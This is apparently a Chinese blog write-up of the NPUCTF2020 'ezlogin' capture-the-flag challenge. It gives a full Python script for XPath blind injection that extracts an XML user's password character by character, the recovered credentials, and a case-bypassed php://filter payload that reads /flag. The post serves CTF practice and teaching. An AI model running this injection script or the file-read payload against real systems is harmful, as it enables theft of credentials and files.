[NPUCTF2020]ezlogin

最新推荐文章于 2024-05-31 23:11:29 发布
最新推荐文章于 2024-05-31 23:11:29 发布
阅读量218 收藏
点赞数
分类专栏: BUUCTF 文章标签: 基础练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/127670740
版权 
知识点:xml中的xpath盲注

分析

根据请求可以看出这应该是一个 xml 格式的数据。
在这里插入图片描述
利用 xpath 盲注,结合 xpath 语法一个一个节点的查。

poc

import requests
from lxml import etree
import time
url = 'http://1fae3303-ca93-435e-b1b4-d18cbfd99948.node4.buuoj.cn:81/login.php'

str = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_'

name = ''

for i in range(1,50):
    for j in str:
        time.sleep(0.1)
        s = requests.session()
        req = s.post(url)
        req.encoding = 'utf-8'
        html = etree.HTML(req.text)
        token = html.xpath('//div[@class="form"]/input[@id="token"]/@value')
        token = "".join(token)

        #盲注根节点
        #payload = f"'or substring(name(/*[1]), {i}, 1)='{j}'  or ''='"

        # 判断root子节点数量,其他同理
        #payload = "'or count(/root/*)=1  or ''='"
        #猜子节点
        #payload = f"'or substring(name(/root/*[1]), {i}, 1)='{j}'  or ''='"

        #payload = f"'or substring(name(/root/accounts/*[1]), {i}, 1)='{j}'  or ''='"

        #判断user节点数量
        #payload = "'or count(/root/accounts/user)=2  or ''='"

        #判断user子节点数量
        #payload = "'or count(/root/accounts/user[2]/*)=3  or ''='"

        #盲注user子节点名字
        #payload = f"'or substring(name(/root/accounts/user[2]/*[3]), {i}, 1)='{j}'  or ''='"

        #用户名
        #payload = f"'or substring(/root/accounts/user[2]/username/text(), {i}, 1)='{j}'  or ''='"

        #密码
        payload = f"'or substring(/root/accounts/user[2]/password/text(), {i}, 1)='{j}'  or ''='"
        data = f"<username>{payload}</username><password>admin</password><token>{token}</token>"
        headers = {
            'Content-Type': 'application/xml'
        }
        req_name = s.post(url,data=data,headers=headers)
        #print(req_name.text)
        if '非法操作' in req_name.text:
            name += j
            print(name)
            break

但是没想到密码还是一个付费的 MD5 解密。

adm1n
gtfly123

登录后可以看到一个 file 参数,那么直接伪协议先读一遍呗。
在这里插入图片描述
测试后发现有过滤,但是不多,可以用大写绕过,对返回的数据也有过滤,可以用过滤器绕过。

PHP://filter/string.toupper/resource=/flag

最后把 flag 转换为小写就可以了。
在这里插入图片描述

reference

https://xz.aliyun.com/t/7791#toc-6
succ3
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[NPUCTF2020]EzRSA
2er0!=O的博客
07-25 532
[NPUCTF2020]EzRSA 附件: from gmpy2 import lcm , powmod , invert , gcd , mpz from Crypto.Util.number import getPrime from sympy import nextprime from random import randint p = getPrime(1024) q = getPrime(1024) n = p * q gift = lcm(p - 1 , q - 1) e = 54722 fla
[NPUCTF2020]ezinclude
qq_40327508的博客
12-09 1648
进入页面发现需要传入name和pass,源代码发现hint 疑似MD5哈希长度拓展攻击,在响应包里面给出啦pass的值 得到了 flflflflag.php ,访问重定向到了其他页面,抓包抓回来,页面提示 include($_GET[“file”]) ,扫目录可以得到 dir.php ,包含他可以看到这个页面列出了 /tmp 下的所有文件 这里考察的是PHP临时文件包含,其基本是两种情况: 利用能访问的phpinfo页面,对其一次发送大量数据造成临时文件没有及时被删除 PHP版本<7.2,利用ph
青少年CTF练习平台 EzLogin exp
最新发布
2301_80395418的博客
05-31 265
【代码】青少年CTF练习平台 EzLogin exp。
[NPUCTF2020]ezlogin (xpath盲注)
记录学习,一起进步
03-26 704
[NPUCTF2020]ezlogin (xpath盲注)
xpath注入[NPUCTF2020]ezlogin
qq_62046696的博客
02-09 663
false or true or true and false ,如果是两个 false or true and false 不就是false了吗。PHP://filter/string.toupper/resource=/flag 转换为大写都可以绕过。不管输入什么,很容易发现登陆就超时了,说明这里token是不断刷新的。这样构造也是一样的目的都是为了闭合后面的',为啥有两个or呢。有的时候会因为网络报错,加一个time.sleep就可以了。这条命令是判断根目录有几个结点,
[NPUCTF2020]Baby Obfuscation.exe.i64
06-02
Baby Obfuscation分析过程
解读“模块的沟通”
08-04
在数字电路设计中,尤其是使用硬件描述语言如Verilog进行设计时,模块间的通信是非常关键的一个环节。这里的“模块的沟通”是指不同模块之间通过信号交互来传递信息和协调操作的过程。本文将深入探讨这一概念,并以...
flash涂鸦板
12-10
简单易操作 一木了然 而且能让你快速体验到FLASH的操作乐趣 让你有想去学的冲动 而且能让你快速掌握简单操作
obfuscation
05-11
obfuscation 基于Allatori的Java代码混淆工具 使用Allatori混淆工具写的一个Maven插件 mvn install此项目,然后在想要混淆的项目的pom文件中引入此插件,并指定配置文件全路径以及要混淆的类所在路径即可使用 ...
[HZNUCTF 2023 preliminary] 2023杭师大校赛(初赛) web方向题解wp 全
Jay17的博客
08-16 1243
[HZNUCTF 2023 preliminary] 2023杭师大校赛(初赛) web方向题解wp 全
[NPUCTF2020]ezlogin-XPATH注入学习
cjdgg的博客
05-13 610
[NPUCTF2020]ezlogin-XPATH注入学习 这题进入后就是一个简单的登录页面,拿御剑没有扫出别的东西,简单的sql注入试了一下也没有任何回显,爆破的话他这里有一个token一直在刷新,所以会有点麻烦,应该也不会拿爆破来考别人 后来看了别人的WP才知道是XPATH注入,以前没遇到过,也不是很了解,于是去找了篇相关文章顺带学习一下 这些是XPATH的一些基础语法和介绍 从这里可以看到它和sql注入还是很相像的,只不过XPATH注入好像没有注释符把后面的都注释掉,所以需要我们去构造闭合后面的
HZNUCTF2023 web
weixin_63231007的博客
05-07 1396
HZNUCTF校赛 赛后复现
HZNUCTF2023初赛web
jayq1的博客
03-28 458
这里只是两行分开写了,其实在一块,schemata),{},1))>{}#这个中括号的地方传入参数。发现最后的判断是false 对应0 所以把0改成1然后base64 加密得到新的cookie。3.此外空格也会被检测需要/**/进行绕过,否则会被检测出hacker。查询列名:发现可疑的id, username, password。一开始考虑过用bp,但是因为加密和翻转的限制,利用bp不方便。首先进入页面时空白的界面,去查看网页源代码也是空的。会发现出现成功的信息,表明查询的信息是正确的。
HZNUCTF2023初赛
Emmaaaaa's blog
03-27 1014
cpdd:摩斯密码 classical:base + 凯撒 child_OTP:异或 child_quadratic_residue:直接开根法 child_proof_work:暴力破解uuid4{8位 - 4位 - 4位 - 12位} chile_steam:异或 child_RSA:基础RSA解密 RSA1:维纳攻击 很简单的数学1:离散对数(discrete_log) child_gcd:费马小定理 (a ** (p-1) = 1 mod p) RSA3:模运算法则,离散对数
从以下代码中找到被藏起来的e,提示:在代码注释中。from Crypto.Util.number import * from gmpy2 import * from secret import flag p = getPrime(25) e = # Hidden q = getPrime(25) n = p * q m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ''' 169169912654178 128509160179202 518818742414340 358553002064450
07-16
m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ``` 在修改后的代码中,我们将 `e` 的值设置为 65537。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值